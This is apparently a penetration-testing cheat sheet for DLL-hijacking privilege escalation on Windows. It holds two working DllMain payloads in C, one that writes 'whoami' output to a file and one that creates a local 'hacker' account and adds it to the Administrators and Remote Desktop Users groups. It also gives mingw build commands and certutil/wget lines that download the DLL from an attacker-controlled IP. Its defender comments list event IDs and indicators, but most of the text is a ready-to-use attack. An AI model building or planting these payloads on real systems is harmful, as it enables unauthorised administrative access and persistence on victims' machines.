
windows_dll.c

setup


sudo apt install gcc-mingw-w64

code


windows_dll.c (variant 1: proof of execution, records which account the loading process runs as)

#include <windows.h>

/*
 * DllMain - library entry point; this variant is a proof-of-execution marker.
 *
 * On DLL_PROCESS_ATTACH it runs `whoami` through system(), redirecting the
 * output to C:\temp\message.txt, and then ends the host process with
 * ExitProcess(0). Every other notification reason just returns TRUE.
 * hDll and lpReserved are not used, and the result of system() is ignored.
 *
 * Defender notes: the command runs with the identity of whichever process
 * loaded the library, so a DLL search path that contains a directory writable
 * by low-privileged users becomes a privilege boundary problem when the
 * loader is a service or other privileged process. Artefacts to look for:
 * an image load from a user-writable directory, a command interpreter spawned
 * as a child of the loading process, and the output file itself. Loading
 * libraries by fully qualified path and tightening directory ACLs removes
 * the precondition.
 */
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    (void)hDll;
    (void)lpReserved;

    /* Only the process-attach notification triggers any work. */
    if (dwReason != DLL_PROCESS_ATTACH) {
        return TRUE;
    }

    system("whoami > C:\\temp\\message.txt");

    /* Terminates the loading process; the return below mirrors the
     * original fall-through. */
    ExitProcess(0);
    return TRUE;
}

windows_dll.c (variant 2: creates a local account and adds it to privileged local groups)

#include <windows.h>

/*
 * DllMain - library entry point; this variant changes local accounts.
 *
 * On DLL_PROCESS_ATTACH it passes three fixed command lines to system(), in
 * order: one `net user ... /add` and two `NET LOCALGROUP ... /ADD` commands
 * naming the Administrators and Remote Desktop Users groups. It then ends the
 * host process with ExitProcess(0). Other notification reasons return TRUE.
 * hDll and lpReserved are not used, and every system() result is ignored.
 *
 * Defender notes: the account name and password are hard-coded in the
 * binary, so the strings are a usable static indicator. When account
 * management auditing is enabled, local account creation and local group
 * membership changes are recorded in the Security log (event IDs 4720 and
 * 4732); a `net`/`cmd.exe` process tree under a service or other unexpected
 * parent is the matching process-creation signal.
 */
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    /* Command lines are issued strictly in this order. */
    static const char *const commands[] = {
        "cmd.exe /k net user hacker hacker /add",
        "cmd.exe /k NET LOCALGROUP 'Administrators' hacker /ADD",
        "cmd.exe /k NET LOCALGROUP 'Remote Desktop Users' hacker /ADD",
    };
    unsigned int idx;

    (void)hDll;
    (void)lpReserved;

    /* Only the process-attach notification triggers any work. */
    if (dwReason != DLL_PROCESS_ATTACH) {
        return TRUE;
    }

    for (idx = 0; idx < sizeof commands / sizeof commands[0]; idx++) {
        system(commands[idx]);
    }

    /* Terminates the loading process; the return below mirrors the
     * original fall-through. */
    ExitProcess(0);
    return TRUE;
}

compile


x86_64-w64-mingw32-gcc windows_dll.c -shared -o windows.dll

deliver


certutil -urlcache -f http://192.168.45.171/windows.dll windows.dll
wget http://192.168.45.171/windows.dll -O windows.dll

other


  • Proof-of-concept payload line that only writes the current account name to a file: system("cmd.exe /k whoami > C:\\Windows\\Temp\\dll.txt");
  • For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
  • For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll
  • source: https://github.com/sagishahar/scripts